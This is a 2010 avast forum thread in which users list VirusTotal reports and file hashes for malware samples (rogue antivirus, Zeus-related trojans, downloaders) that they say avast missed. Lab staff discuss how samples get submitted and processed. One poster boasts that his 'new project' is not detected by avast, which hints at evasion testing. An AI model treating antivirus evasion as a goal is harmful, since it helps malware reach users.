http://www.virustotal.com/file-scan/report.html?id=50f1e0f1d67c512ccf52968649c779aabadc0024ca8a4ca6057418661928faf8-1286702655
FAKE.AV
http://www.virustotal.com/file-scan/report.html?id=5d08da063231545fea060e71e15507bea60c6ad97fd1700f53545fab5cf5898e-1285189006
RANSOM
-
Top 10 File Submissions (Yesterday - October 10, 2010
http://www.virustotal.com/file-scan/report.html?id=4a8cfca9e280f5586c69bd9948099936a3824b0221bb571680f121d1342b4fc3-1286720346
http://www.virustotal.com/file-scan/report.html?id=c81f47b0501627fd4616088908f24a9a5d87c9093fcf5516e072eb11ef635089-1286725443
http://www.virustotal.com/file-scan/report.html?id=eb080beb52532084e750ea9bb8f07dac0546325a06cc5757300d1e86cda311c9-1286704474
http://www.virustotal.com/file-scan/report.html?id=bcf4ae360fd9911e086b1c2b6d7fa310878119110cabc57fff9ae54ca325c3ae-1286712048
http://www.virustotal.com/file-scan/report.html?id=151a6e1fb7f2bfbe109e57af0759b52e02c4c50f95fd9eba5b39a9ca6df27edd-1286731205
-
http://www.virustotal.com/file-scan/report.html?id=dd48243c92f56cdf0bd82277188bca55bdc1ee8fd780cc0a191da1cc3022bbcb-1286722277
ROGUE
-
Represents half of the infections here in Brazil.
Do you have a link to these statistics?
No but will read something about.
-
ROGUE
http://www.virustotal.com/file-scan/report.html?id=e88fc12405ae7f28b368d28d921f7c5e554f00d2a233c54c1e827a5c83a83124-1286744412
MD5 : f30bbe6c1be7dcfba53c0ff91fe9611f
SHA1 : 3ec4e234202f91be68689acbabf0b9afcc296c1f
SHA256: e88fc12405ae7f28b368d28d921f7c5e554f00d2a233c54c1e827a5c83a83124
TROJAN
http://www.virustotal.com/file-scan/report.html?id=9e85108aad359dcf78b710219ac793ce8ec6f11c2b45d8752be0311918f5478e-1286745103
MD5 : f62f0ea09dbce2004479913b32627c09
SHA1 : 9c1550914ccf925f462393f76aff750e3d922001
SHA256: 9e85108aad359dcf78b710219ac793ce8ec6f11c2b45d8752be0311918f5478e
TROJAN
http://www.virustotal.com/file-scan/report.html?id=2616945a7ad2fddc354f05d5f7ce8163e32d1413155450922c0f87ac401b8f27-1286745416
MD5 : d17eb44d70475567b9f2179a83d13742
SHA1 : cd3f20e2e397cca28692daa3ae3d8128c3c48319
SHA256: 2616945a7ad2fddc354f05d5f7ce8163e32d1413155450922c0f87ac401b8f27
ROGUE
http://www.virustotal.com/file-scan/report.html?id=bf624604a1ff74205337b7decf9f87a459c1e4a78c96f5ab3f2427dbaa30e82a-1286746026
MD5 : 9156935075b0d1a7ed5cdde328adb770
SHA1 : 5130017edf8bb60c36e450cf226d5f663ad2ae74
SHA256: bf624604a1ff74205337b7decf9f87a459c1e4a78c96f5ab3f2427dbaa30e82a
-
ROGUE
http://www.virustotal.com/file-scan/report.html?id=84e684de433dd3f05428caf888de4d350908c39fcf6cddfc69079424d4957c10-1286746576
MD5 : 9902efa3f2347c2ca700ea7e530cc5da
SHA1 : 644cca819711b244f869fa0dae71aa40a23198b9
SHA256: 84e684de433dd3f05428caf888de4d350908c39fcf6cddfc69079424d4957c10
http://www.virustotal.com/file-scan/report.html?id=46a15ed01953fd6562fbe757b72002197831ece572c77fec677ba9d92072c191-1286746792
MD5 : 46c9efcb59e07ac75d88d333112e78f7
SHA1 : 29660f2cfa94c78fe637c00757bd7098b381ded7
SHA256: 46a15ed01953fd6562fbe757b72002197831ece572c77fec677ba9d92072c191
http://www.virustotal.com/file-scan/report.html?id=82ed55d14ad5466ffd041edb6df1161647c5d88ef356ce86604a85fd937ea56e-1286747427
MD5 : 022f6b5772d69881a19f041c119447e1
SHA1 : 65ee60e70b1664aba79752678977166ee608e505
SHA256: 82ed55d14ad5466ffd041edb6df1161647c5d88ef356ce86604a85fd937ea56e
TROJAN
http://www.virustotal.com/file-scan/report.html?id=5b3d4395b0f5acd40bc20f4bf3930cbd14da3d240ad67f7ab9a65de0681e8742-1286749271
MD5 : 2d2f0c7af61867cd84f2e419a62cef16
SHA1 : e734bb114c2f47dc900d3a5a526db94f0b752ba0
SHA256: 5b3d4395b0f5acd40bc20f4bf3930cbd14da3d240ad67f7ab9a65de0681e8742
-
TROJAN (Zeus related)
http://www.virustotal.com/file-scan/report.html?id=e626cd0afc2a086eefd7d65275391e784416ce1364b13fe79eb28a9329e770c1-1286754374
MD5 : c4d4ab9ca427c0cbae557a7c2f374410
SHA1 : 089d2718b4d12fde47d605862e309c97794f6cf8
SHA256: e626cd0afc2a086eefd7d65275391e784416ce1364b13fe79eb28a9329e770c1
-
How can you say this is a missed sample as nothing on Virustotal detects anything on that sample.
-
How can you say this is a missed sample as nothing on Virustotal detects anything on that sample.
Is Virus Total the holy grail? Just because none, at this time, detects a thing, does it mean is nothing? ???
I've been adding reports that some do detect, most do detect, and I got this one that none detect so far. But, it is related to Zeus.
If, among all, avast! also does not detect, then I can assume it misses it? ???
-Edit-
Or is only suppose to place reports that others do detect, but avast! doesn't yet? If so, then I apologize, as I made confusion.
-
m00nbl00d, are you following the suggestions at the first post of the thread?
Otherwise, the reports will have very little value after all.
-
VirusTotal: 2/43
http://www.virustotal.com/file-scan/report.html?id=65a6508e8b43a54a17d5c20c49fbe20f68b12fe5517d1c5dfa41b0540bf64896-1286779262
Heuristic.BehavesLike.Win32.Suspicious.H (McAfee-GW-Edition)
MD5 : 6355177091f224eb970c365e4d06b269
SHA1 : 89361620e489c1876963c32e555afe7d58b9ca04
SHA256: 65a6508e8b43a54a17d5c20c49fbe20f68b12fe5517d1c5dfa41b0540bf64896
.
-
Trojan (Zeus related)
http://www.virustotal.com/file-scan/report.html?id=380087229a5a6182c5b1ccd78e1cd4ac6e0275f2b3623f78272c816fd07b2d71-1286801243
MD5 : bd41f21be524da820c4f555c7d157e60
SHA1 : da36d0c020debd1be81e48993d81628b104a925e
SHA256: 380087229a5a6182c5b1ccd78e1cd4ac6e0275f2b3623f78272c816fd07b2d71
Detected by McAfee-GW-Edition as Heuristic.LooksLike.Win32.Suspicious.F
ROGUE
http://www.virustotal.com/file-scan/report.html?id=5c052870ce034a1600187282e290c56cefef7c592e2dfcc054149a3e00630f76-1286801600
MD5 : fe65a0eb0d8f6b38ada4bf55af56ae6a
SHA1 : b4d3317591131869dc4e90b109a95cb8353e0e2b
SHA256: 5c052870ce034a1600187282e290c56cefef7c592e2dfcc054149a3e00630f76
TROJAN (Zeus related)
http://www.virustotal.com/file-scan/report.html?id=48061ade1f85d7040bca8bf056c95be8dc8568658841314db4874eeb699a0cbf-1286801855
MD5 : 8279e011750c6499e01026f2aa370d56
SHA1 : 69e333fbc316e63c23284f1b1312c6782e908515
SHA256: 48061ade1f85d7040bca8bf056c95be8dc8568658841314db4874eeb699a0cbf
-
VirusTotal: 22/43
http://www.virustotal.com/file-scan/report.html?id=ecea9a1c297b62c4c1fb9c21a92dc50277eba60c53e0c91a701981f2a05db6fd-1286855009
TR/Spy.Banker.Gen (Avira)
MD5 : 09580a2d997b6b4c9d68e781b32364be
SHA1 : dc8c09b0651ba125dfcffe70e15faa3a9fafb061
SHA256: ecea9a1c297b62c4c1fb9c21a92dc50277eba60c53e0c91a701981f2a05db6fd
-
Trojan.
http://www.virustotal.com/file-scan/report.html?id=380087229a5a6182c5b1ccd78e1cd4ac6e0275f2b3623f78272c816fd07b2d71-1286865579
-
ROGUE
http://www.virustotal.com/file-scan/report.html?id=45873cade00ef2de771777511673b53ad3ca9f851f0cb57adcf90ff23f3b90c4-1286891196
MD5 : d04954c1a4cf72d14f365a7bb9e6d60d
SHA1 : d1113e86c6f739ee82837e44cec068fb27ffdafa
SHA256: 45873cade00ef2de771777511673b53ad3ca9f851f0cb57adcf90ff23f3b90c4
ROGUE
http://www.virustotal.com/file-scan/report.html?id=4851da897bf2992b5daa3cdc4b3dd4d0103d27b63e9201fc25fb9125fbbeab3f-1286892008
MD5 : 0b157157b293430fb8c9a35ae17fd0d8
SHA1 : 969e2500c38c80c4a5d3911d096c0fed435fcd49
SHA256: 4851da897bf2992b5daa3cdc4b3dd4d0103d27b63e9201fc25fb9125fbbeab3f
ROGUE
http://www.virustotal.com/file-scan/report.html?id=ecb766252fa425d4d7610517f49509fefd4e81e1053aefb6eba7d3d5cf04e05b-1286892878
MD5 : d92514a45a5eac2a1d2dec8dd33c81da
SHA1 : 3f4af4537658bdf507a444e1ec10d6c3a0c4899f
SHA256: ecb766252fa425d4d7610517f49509fefd4e81e1053aefb6eba7d3d5cf04e05b
ROGUE
http://www.virustotal.com/file-scan/report.html?id=8444e1b069e7060001f040e1d2b4eab5fc08397a0de5571c61d456a194bc6dac-1286893115
MD5 : 6991987f5404662c57f9d4ab8b6a1851
SHA1 : 15e86de816047e3ccef0f86d449b811e1bd266f3
SHA256: 8444e1b069e7060001f040e1d2b4eab5fc08397a0de5571c61d456a194bc6dac
TROJAN
http://www.virustotal.com/file-scan/report.html?id=8444e1b069e7060001f040e1d2b4eab5fc08397a0de5571c61d456a194bc6dac-1286893115
MD5 : 6991987f5404662c57f9d4ab8b6a1851
SHA1 : 15e86de816047e3ccef0f86d449b811e1bd266f3
SHA256: 8444e1b069e7060001f040e1d2b4eab5fc08397a0de5571c61d456a194bc6dac
-
TROJAN
http://www.virustotal.com/file-scan/report.html?id=3cab860e5ab2c7dfac5f1bd656b0b31e58aa3d42cbdd67fdfbd0dc3591e68f4a-1286894775
MD5 : 19283d1343ef0be90a317198585520c1
SHA1 : ad6918b1a630ae229eebe2bb2c240f4439691d31
SHA256: 3cab860e5ab2c7dfac5f1bd656b0b31e58aa3d42cbdd67fdfbd0dc3591e68f4a
TROJAN
http://www.virustotal.com/file-scan/report.html?id=26ca928094211abe9f24a3d0c5fc35484782db8ec2b6c45e92bbf3ebdfe3db9e-1286894999
MD5 : 124960c4b1e002ac7725308e7912a64f
SHA1 : 067f5934d94b670f4b7e04f0e25d21d0f25e8f0d
SHA256: 26ca928094211abe9f24a3d0c5fc35484782db8ec2b6c45e92bbf3ebdfe3db9e
-
VirusTotal: 20/41
http://www.virustotal.com/file-scan/report.html?id=82a91174739fd00ec38c31c41ecf3268aad3a9cc07ceb6923635d65276cff982-1286909055
TR/Crypt.XPACK.Gen (Avira)
MD5 : 79a137546440b649d05a74b74d26fb39
SHA1 : 87bd2f282ca5501173e2b995fb8711936dbdcec7
SHA256: 82a91174739fd00ec38c31c41ecf3268aad3a9cc07ceb6923635d65276cff982
-----------------------------------------------------------------------
VirusTotal: 19/40
http://www.virustotal.com/file-scan/report.html?id=1160b9f1934a9dd9231f31560b99a0701c44c0c2c605fdbdeadd05285e3452a4-1286909991
TR/Crypt.CFI.Gen (Avira)
MD5 : 98a0cd18c03892c7f83148afa4c13ffb
SHA1 : b0428d8f55273ba3e45f3fb71bb1c1e91a4211f6
SHA256: 1160b9f1934a9dd9231f31560b99a0701c44c0c2c605fdbdeadd05285e3452a4
-------------------------------------------------------------------------
VirusTotal: 19/42
http://www.virustotal.com/file-scan/report.html?id=013903434d8cd9cebe8913def0a0022c1ac03ac30b9ee319c404c770d186b93d-1286910374
TR/VB.Downloader.Gen (Avira)
MD5 : e761ffd4493bc56044fef408b43cd387
SHA1 : 17208a7048df26c696ba395112f041fabd98abd5
SHA256: 013903434d8cd9cebe8913def0a0022c1ac03ac30b9ee319c404c770d186b93d
-------------------------------------------------------------------------
VirusTotal: 19/41
http://www.virustotal.com/file-scan/report.html?id=0dff24330bc30faeec1b36e6f9c535359f7344d839748149f743f3f307be96f1-1286910870
TR/VB.Downloader.Gen (Avira)
MD5 : addf29b4e4c8b875fbcef278bf66a7db
SHA1 : 0d069f5bc1faeeb38be5ee57e370620e88296f73
SHA256: 0dff24330bc30faeec1b36e6f9c535359f7344d839748149f743f3f307be96f1
---------------------------------------------------------------------------
VirusTotal: 21/43
http://www.virustotal.com/file-scan/report.html?id=c80367480094aa649ad0b9914b9c1cb4c6320101ee3bae4bda6775a0ab736db6-1286913569
TR/Crypt.CFI.Gen (Avira)
MD5 : 9c75702f09b15fef35f205b12d4f15e6
SHA1 : 5109a83bf5b5f06fe640c84b2e2665ea1cb38c5d
SHA256: c80367480094aa649ad0b9914b9c1cb4c6320101ee3bae4bda6775a0ab736db6
-----------------------------------------------------------------------
I will not send more until I have to be detected by avast.
-----------------------------------------------------------------------
EDIT.:
This has not been detected yet by avast:
VirusTotal: 2/43
http://www.virustotal.com/file-scan/report.html?id=65a6508e8b43a54a17d5c20c49fbe20f68b12fe5517d1c5dfa41b0540bf64896-1286779262
Heuristic.BehavesLike.Win32.Suspicious.H (McAfee-GW-Edition)
MD5 : 6355177091f224eb970c365e4d06b269
SHA1 : 89361620e489c1876963c32e555afe7d58b9ca04
SHA256: 65a6508e8b43a54a17d5c20c49fbe20f68b12fe5517d1c5dfa41b0540bf64896
.
-
ROGUE
http://www.virustotal.com/file-scan/report.html?id=b542593a97bb9fa1e949e3daf4ec7ea22884295745ff2b93e48218bc3f2729e9-1286984588
MD5 : ae57cb81a246972e63378c956744291d
SHA1 : 0397683698f9bf209a883e7b1e7100ace35c0239
SHA256: b542593a97bb9fa1e949e3daf4ec7ea22884295745ff2b93e48218bc3f2729e9
TROJAN
http://www.virustotal.com/file-scan/report.html?id=9f7f7a40c51de30a9f2160b72865ac7323c0394de3dfce7b0e58e5de63eac756-1286985392
MD5 : e3f83a9d5591d149ea54fef696bcdad8
SHA1 : e02f0b4692fcf2bf595ef391c73b9f482adea09d
SHA256: 9f7f7a40c51de30a9f2160b72865ac7323c0394de3dfce7b0e58e5de63eac756
ROGUE
http://www.virustotal.com/file-scan/report.html?id=79bb43c75546db0bc1ad0cc27529198ab60980a151c82ac4eb5a416905645f9e-1286985963
MD5 : 29ef8c98b57185bcc4ff8c5c9c494da8
SHA1 : 6aecfe6a72be9f409f8b4144a458e3e45be6fee5
SHA256: 79bb43c75546db0bc1ad0cc27529198ab60980a151c82ac4eb5a416905645f9e
TROJAN/ZEUS
http://www.virustotal.com/file-scan/report.html?id=cef9cc3be07749b2472130560b793c4ed7642ec856d1104fa6b71ff8bad62a74-1286986116
MD5 : c59ef71540aa1735c31c3c3d9bb32958
SHA1 : 069f811b4c3d0b35d481fbc697580bfae7339070
SHA256: cef9cc3be07749b2472130560b793c4ed7642ec856d1104fa6b71ff8bad62a74
-
ROGUE
http://www.virustotal.com/file-scan/report.html?id=50880380b9a2a368c0460a580895041b7f32c468efbd1bd08ce300c926ea6cd0-1286986285
MD5 : bdb6615f4a274bfd159436148fdbe1c7
SHA1 : a70441c652e6e43cac7e2ac513834fb36d0574ba
SHA256: 50880380b9a2a368c0460a580895041b7f32c468efbd1bd08ce300c926ea6cd0
TROJAN/ZEUS
http://www.virustotal.com/file-scan/report.html?id=6319188830903712b4296b6e9c6ece7e53a1232035786d0f218c340c78332b93-1286986548
MD5 : ace6aec48663a0179af2e60cceb2ebb4
SHA1 : 733f7be9011302f17d9cae440056754d5301dd1f
SHA256: 6319188830903712b4296b6e9c6ece7e53a1232035786d0f218c340c78332b93
-
VirusTotal: 22/42
http://www.virustotal.com/file-scan/report.html?id=aba7f0ddd813cf99259c753f5a149098289760097df9de7ee01cebd74d31009d-1287036007
TR/Crypt.CFI.Gen (Avira)
MD5 : 37e1eaf4cd3f80e9618942e0708a16e1
SHA1 : 32c06264c68a800a3b2e3ad2ffb9935e73f31ece
SHA256: aba7f0ddd813cf99259c753f5a149098289760097df9de7ee01cebd74d31009d
ssdeep: 6144:WdPTN03baw5APiU/twz4+skBXShTdYREeycaekOLtOK7LSEIRkCAsuuzps5u6rnJ:WNTN0
3NU2KOMWVaekXK7L8y9I6db
File size : 347136 bytes
First seen: 2010-10-14 06:00:07
Last seen : 2010-10-14 06:00:07
----------------------------------------------------------------------------
VirusTotal: 6/42
http://www.virustotal.com/file-scan/report.html?id=65a6508e8b43a54a17d5c20c49fbe20f68b12fe5517d1c5dfa41b0540bf64896-1287047835
Delf.TTZ (AVG)
MD5 : 6355177091f224eb970c365e4d06b269
SHA1 : 89361620e489c1876963c32e555afe7d58b9ca04
SHA256: 65a6508e8b43a54a17d5c20c49fbe20f68b12fe5517d1c5dfa41b0540bf64896
ssdeep: 12288:tUmTk8F0KhaR2s68HbHyD1PzLqkRp+fg2b:xQ8fsv2PSwpH2
File size : 527360 bytes
First seen: 2010-10-10 17:59:33
Last seen : 2010-10-14 09:17:15
------------------------------------------------------------
VirusTotal: 20/42
http://www.virustotal.com/file-scan/report.html?id=bed57775dc2f9870c11671906f6cdddbe20983efe269830bbb488dadf4aae5f4-1287049482
TR/VB.Downloader.Gen (Avira)
MD5 : c799242d0c38bd81b965bfd119ca47c3
SHA1 : e71a8e46fa74811288c6237320c9758b851bcb69
SHA256: bed57775dc2f9870c11671906f6cdddbe20983efe269830bbb488dadf4aae5f4
ssdeep: 768:OuSPC8w03SCUSDZArU83z555o3kVZ6+XNZXRuvCfJ4lcdfbIDX4U/rx:+00CzeZfII346+X
LXFr5bIhx
File size : 159744 bytes
First seen: 2010-10-14 09:44:42
Last seen : 2010-10-14 09:44:42
-
TROJAN/ZEUS
http://www.virustotal.com/file-scan/report.html?id=e521d9d4610d90067b50df211240e0c72bbecf266bfa9dd29f999f28e6030493-1287058668
MD5 : a94d8d952e071d5897fa6ef1539c6e59
SHA1 : b956f5ec6319470210532600e58663b7bd6e883f
SHA256: e521d9d4610d90067b50df211240e0c72bbecf266bfa9dd29f999f28e6030493
-
Hello,
I think that the best way is to send the files to virus@avast.com with subject "Undetected malware".
This VT links on forum doesn't help us at all, you can include them to email body.
Milos
-
i am glad my new project is not detected by avast ;D 8)
anyway -.-
http://www.virustotal.com/file-scan/report.html?id=e7f1a013004463f9f3c2c4c84cb6b9eb51418622c3c760d4557a99396f06a84d-1287084779
-
VirusTotal: 20/43
http://www.virustotal.com/file-scan/report.html?id=832d7c815110ce43b58cdf66f7d6386bb249af0038152f3fa912ca61bef58cff-1287108590
TR/VB.Downloader.Gen (Avira)
MD5 : 21b4f22fb4f09ad1e70afb41684b5103
SHA1 : fefba4a9fa348f655db4b1f9a902c05484f44ae7
SHA256: 832d7c815110ce43b58cdf66f7d6386bb249af0038152f3fa912ca61bef58cff
ssdeep: 768:AuSZEjw03SCU63BET555IHY1ZZ+XjXQWIxVkguu:wV0Cz63O1oHkZ+XjXfgr
File size : 159744 bytes
First seen: 2010-10-15 02:09:50
Last seen : 2010-10-15 02:09:50
------------------------------------------------------------------------
VirusTotal: 21/43
http://www.virustotal.com/file-scan/report.html?id=cd5470605c564b8f7bca95e59eb9c15198d7935aa6fc5edb5de2bd58f5c61a8c-1287109607
TR/Dropper.Gen (Avira)
MD5 : ffb0f91b6f4baa70011a2b6615dcb0c9
SHA1 : aae7264e23e2bac578c7b4671fc7171a05432c58
SHA256: cd5470605c564b8f7bca95e59eb9c15198d7935aa6fc5edb5de2bd58f5c61a8c
ssdeep: 12288:3w4VrnE/2foyCqHFlznwl1YlZBCj/XRr7Y3hh:A4VrnMCoyRwl18Bm/Xkhh
File size : 414562 bytes
First seen: 2010-10-15 02:26:47
Last seen : 2010-10-15 02:26:47
-
File name:
Avast AntiVirus 4.7.x keygen by-GCT.r00
Submission date:
2010-10-15 12:10:08 (UTC)
Current status:
finished
Result:
7/ 43 (16.3%)
Gen:Variant.Kazy.1653(BitDefender)
http://www.virustotal.com/file-scan/report.html?id=b97507708b29aaba8d99f70e5c74a1534e2dbc6d5ad661db0fa19effa8d56f87-1287144608
-
Why are you all not taking any notice of what a member of the avast virus labs is saying, this topic is pointless.
Hello,
I think that the best way is to send the files to virus@avast.com with subject "Undetected malware".
This VT links on forum doesn't help us at all, you can include them to email body.
Milos
So please do as is suggestive, send the samples to avast. So I guess the next step is in your hands send the samples and stop posting or I guess this topic will be closed too.
-
Why are you all not taking any notice of what a member of the avast virus labs is saying, this topic is pointless.
Hello,
I think that the best way is to send the files to virus@avast.com with subject "Undetected malware".
This VT links on forum doesn't help us at all, you can include them to email body.
Milos
So please do as is suggestive, send the samples to avast. So I guess the next step is in your hands send the samples and stop posting or I guess this topic will be closed too.
I sort of disagree. When sending samples to www.virustotal.com, it gives a general idea of the speed the different security vendors apply to bring out new detections to their products, free and paid. I've come across one sample from September, which avast! still did not detect. Most of them did. I didn't post it here, but for sure that avast! got it, because the sample I checked wasn't uploaded first. It was a recheck.
So, threads like this one here serve to show that user base isn't blind, and is actively seeing whether or not the security tools they chose to use is able to detect threats or not, and how fast they do it.
I believe the normal thing to do is send to www.virustotal.com, because that way we'll be helping every other person making use of other security solutions.
If there are samples that are weeks old, and avast! still doesn't detect them, then for sure, I believe it's in everyone's best interest to know that it doesn't, yet.
I guess is a matter of perspective. For avast! team may make no sense and have no use, but maybe it is of use for the user base, so they know whether or not their chosen AV is able to detect or not, and for how long it will remain unable to detect, and obviously, protect them. ;)
Regards
-
There is nothing wrong in sending samples to virustotal, no one has suggested you shouldn't do that. In fact it is contrary to what Milos suggested to a) send the samples to avast and b) if you did submit to virustotal put the results link in the email body of the submission.
Regardless of what you think of the topic showing the user base isn't blind, it doesn't help the virus labs at all (as Milos said), they need samples.
If you check the first post of this topic, as to the purpose it was intended:
http://forum.avast.com/index.php?topic=64122.msg541929#msg541929 (http://forum.avast.com/index.php?topic=64122.msg541929#msg541929)
I'm starting a new one trying to help avast improving detection if possible.
So as Milos and Maxx mentioned simply posting links to virustotal results in this topic doesn't meet Tech's hope to help detections on its own "This VT links on forum doesn't help us at all, you can include them to email body."
-
So as Milos and Maxx mentioned simply posting links to virustotal results in this topic doesn't meet Tech's hope to help detections on its own "This VT links on forum doesn't help us at all, you can include them to email body."
avat is it ...
If you are not satisfied that replace antivirus.
End !
:'(
-
I sort of disagree. When sending samples to www.virustotal.com, it gives a general idea of the speed the different security vendors apply to bring out new detections to their products, free and paid. I've come across one sample from September, which avast! still did not detect. Most of them did. I didn't post it here, but for sure that avast! got it, because the sample I checked wasn't uploaded first. It was a recheck.
+1
Although we need to consider the sheeper behavior of virus total and the rush not to detect but to not get out bad in the picture...
So, threads like this one here serve to show that user base isn't blind, and is actively seeing whether or not the security tools they chose to use is able to detect threats or not, and how fast they do it.
I think the same.
I believe the normal thing to do is send to www.virustotal.com, because that way we'll be helping every other person making use of other security solutions.
I disagree. The good thing to do is the what can allow we to get a better detection (and protection) asap. So I think we need to follow a way that help, not a way that we think it helps...
If there are samples that are weeks old, and avast! still doesn't detect them, then for sure, I believe it's in everyone's best interest to know that it doesn't, yet.
It's difficult to say, as the samples could be infinite, the garbage could be very huge.
So, trying to verify 50.000+ samples a day will move us toward this "lockout" of technology.
That's the reason of asking other alternatives to "signatures-only" method of detection.
I guess is a matter of perspective. For avast! team may make no sense and have no use, but maybe it is of use for the user base, so they know whether or not their chosen AV is able to detect or not, and for how long it will remain unable to detect, and obviously, protect them. ;)
That's one of my intentions opening this thread.
-
<snip>
I guess is a matter of perspective. For avast! team may make no sense and have no use, but maybe it is of use for the user base, so they know whether or not their chosen AV is able to detect or not, and for how long it will remain unable to detect, and obviously, protect them. ;)
That's one of my intentions opening this thread.
As far as perspective goes, if no one who posts VT results in this topic goes back and checks if they are now detected by avast (no longer missed) and edits their post to say they are now detected. Then there is no perspective at all only a list of missed detections and nothing to indicate when they are detected, so I don't see how that helps the user base.
Just browse through this topic and see just how many people follow up their post when the sample is detected and you will see how unbalanced it is, so it is very one sided. Given that I don't feel it can provide any useful information for the user base to make an informed decision on missed samples and when they are included in the database if no one if modifying the original posts when it is detected.
-
MD5 : 5e397750d32baa7d37f27d144fe4e2c4
SHA1 : 7281aa700b1703f4d1528aac7cc314e52817e848
SHA256: 9202e99fdc324ea8f53549d0c01a5a1dc225350fa923add6fbcdbe529dda4107
ssdeep: 3072:qqavcStFlrE8j6ptIxYhEK4QRzEYX2CPWkLUh4QPSCHnfkW:aHtFlg1pFx4QEq2CjloSCH
http://www.virustotal.com/file-scan/report.html?id=9202e99fdc324ea8f53549d0c01a5a1dc225350fa923add6fbcdbe529dda4107-1287166710
2. http://www.virustotal.com/file-scan/report.html?id=05182bc7bde7bfd9dfbb6ece0f5bb368eb999e70637b4e4cdf7e75a6599b59e7-1287168704
(http://prikachi.com/images/305/2585305j.png)
-
As far as perspective goes, if no one who posts VT results in this topic goes back and checks if they are now detected by avast (no longer missed) and edits their post to say they are now detected. Then there is no perspective at all only a list of missed detections and nothing to indicate when they are detected, so I don't see how that helps the user base.
You're fully right. I've tried to do this at the beginning but, believe me, it's boring boring boring. It takes molasses to avast to add some detections... And will we keep checking checking and checking?
-
I know it is boring and a real chore, which is why it will always be one sided.
Since some of the virus labs team have said that the VT Results on their own are of no help, I really can't see the purpose of this topic at all if people aren't going to update their previous posts when they are detected. That in the last 8 pages of this topic is woefully lacking.
If people submit the samples from the chest (with VT Results link and brief info), they can at least scan it from within the chest to see if it is included, if not it is very simple to submit it again and again and again if necessary.
The files that I submit from the chest, I test weekly and perhaps I've been lucky most are added, but some take a second or third submission. I submitted one yesterday a UPS email scam one and it is detected today, see image.
-
I really can't see the purpose of this topic at all
Read again the other purposes of this thread... Maybe the virus labs aren't the only ones who are looking for benefits... Maybe we don't have to shut up just because of that. Why do they worry about this thread then? Just let it be like it is... Or there is something more than that and they are not comfortable with this thread?
submit it again and again and again if necessary.
We're not stupid... We won't keep submitting files just to bring up attention.
There is a more serious way to work.
There is something more fun to do.
The files that I submit from the chest, I test weekly and perhaps I've been lucky most are added, but some take a second or third submission. I submitted one yesterday a UPS email scam one and it is detected today, see image.
Henrique is submitting a lot of trojans active here in Brazil.
avast never has the fastest detection... ever...
-
I simply can't see any other benefits/purposes of this topic which I think you stated quite clearly in the first post, to help improve detections and that clearly isn't happening as they have no samples to work from and you can't attach them or post links to file sharing sites (why the last topic on this was closed).
No one is saying you are stupid - If you aren't prepared to a) modify old posts in this topic when they are detected and/or b) resubmit from the chest if after a reasonable time they aren't detected, then don't bother. No one is standing over anyone with a stick, but me having gone to the trouble to submit a file I generally see it through to the end.
Yes Henrique is and if you remember rightly Maxx was trying to do something different so he could submit directly using ftp or other means.
-
I thought that security vendors would get the samples from Virus Total? They do, don't they? So, after all, there seems to be a point in sending them to Virus Total, because avast! will get them.
Anyway, I just wanted to help. I personally make no use of avast!, but I do have friends and family members who do, and for sure it would help a lot is avast! team was faster providing new detections for not so new malware. I'm pretty sure some other friends make use of other solutions like AVG, or whatever it may be; hence the reason I upload the samples to Virus Total and not just one vendor. It would seem rather odd.
Also, there's no point in modifying posts after 1 day or even 3 days. If, say two weeks have passed and still no detection for XYZ sample from avast!, then yes, give an update. The same if a detection is already out.
Anyway, if avast! team considers this thread to be trivial, then I'm done.
Cheers
-
I said it many times: We get *T*E*N*S* of *T*H*O*U*S*A*N*D*S* files a day. We're adding thousands of detections a day, most of them automatically generated and the rest is semi-manually processed by finite numbers of humans. There are certain prioritizations in the process, which I admit may not be the best, but still position us in front of other products detectionwise.
Yes, I know we don't detect everything - and it's not possible to detect everything in these times.
If you submit something on VT, we'll eventually get it from them and add it to the database as soon as possible.
-
why the team avast does not adopt the other criterion.
If the sample from VirusTotal is not detected or not analyzed in a timely fashion she gets the name given by another antivirus.
This would make avast unbeatable.
-
Because other AVs are unreliable as the source of the detection. Firstly, because they're FP infested and the second problem is that some vendors like to play games by creating innocent samples with their detections and then measuring how many other AVs are caught by the trap.
-
some vendors like to play games by creating innocent samples with their detections and then measuring how many other AVs are caught by the trap.
Kubecj, is it possible to name them? If not, I understand.
But this seems a ridiculous attitude, not respectful. It would be good to know who is playing the "bad" guy role in the game. Of course, you can prove what you say. Of course, I believe you.
-
Yes Henrique is and if you remember rightly Maxx was trying to do something different so he could submit directly using ftp or other means.
Why Maxx not give us other direct way to send samples?
-
some vendors like to play games by creating innocent samples with their detections and then measuring how many other AVs are caught by the trap.
Kubecj, is it possible to name them? If not, I understand.
But this seems a ridiculous attitude, not respectful. It would be good to know who is playing the "bad" guy role in the game. Of course, you can prove what you say. Of course, I believe you.
http://www.securelist.com/en/weblog?weblogid=208188011
http://www.theregister.co.uk/2010/02/10/kaspersky_malware_detection_experiment/
http://blog.eset.com/2010/02/02/kaspersky-virus-total-and-unacceptable-shortcuts
-
better false positives or fake detection than infected with bankers,zbots,and other things ;D
but if you say so,i will start send the samples to lab.
-
Why Maxx not give us other direct way to send samples?
which other direct way?
-
Why Maxx not give us other direct way to send samples?
which other direct way?
ftp ?
other e-mail ?
-
If you submit something on VT, we'll eventually get it from them and add it to the database as soon as possible.
Oh, I did not know this!
-
Trojan (Bredolab) File name: updugt32.exe
http://www.virustotal.com/file-scan/report.html?id=9d90abb84ba08b6e9bbe3b404818123a249d12073081e073afef12a061ff8494-1287214603
Detected by Windows Task Manager - svchost.exe 100% load
-
ftp ?
other e-mail ?
http://forum.avast.com/index.php?topic=64122.msg546624#msg546624 ftp was mentioned already..
-
http://forum.avast.com/index.php?topic=64122.msg546624#msg546624 ftp was mentioned already..
ftp is this ?
ftp://ftp.avast.com/incoming/
Henrique - Bankers is what bothers you, right? we're receiving samples from Bank of Brasil (and maybe other institutes in Brasil), but it's probably not enough to cover this regional issue.. if you have better samples, we can talk about a processing of your submission through our ftp (a daily uploaded batch with a predefined name), if you prove the quality of your feed, we can dedicate someone to its processing maybe..
What it means ?:"a daily uploaded batch with a predefined name"
-
FTP is not a good idea - unless you are specifically asked for that (for a specific file), and the one who asked you is expecting the file there.
Having a FTP folder full of anonymous files uploaded by nobody knows who, not knowing what are malware samples, what are false positive samples, crash related files, somebody trying to make a public warez folder, or something different... is completely useless. The content just gets deleted, there's nothing to do with that. So, simply deleting the sample, or uploading it to the incoming folder on the FTP without previous arrangement - is mostly equal.
Other e-mail? Well, this other e-mail would, in the end, be processed exactly the same way as the usual virus@ e-mail... so what's the point?
-
What it means ?:"a daily uploaded batch with a predefined name"
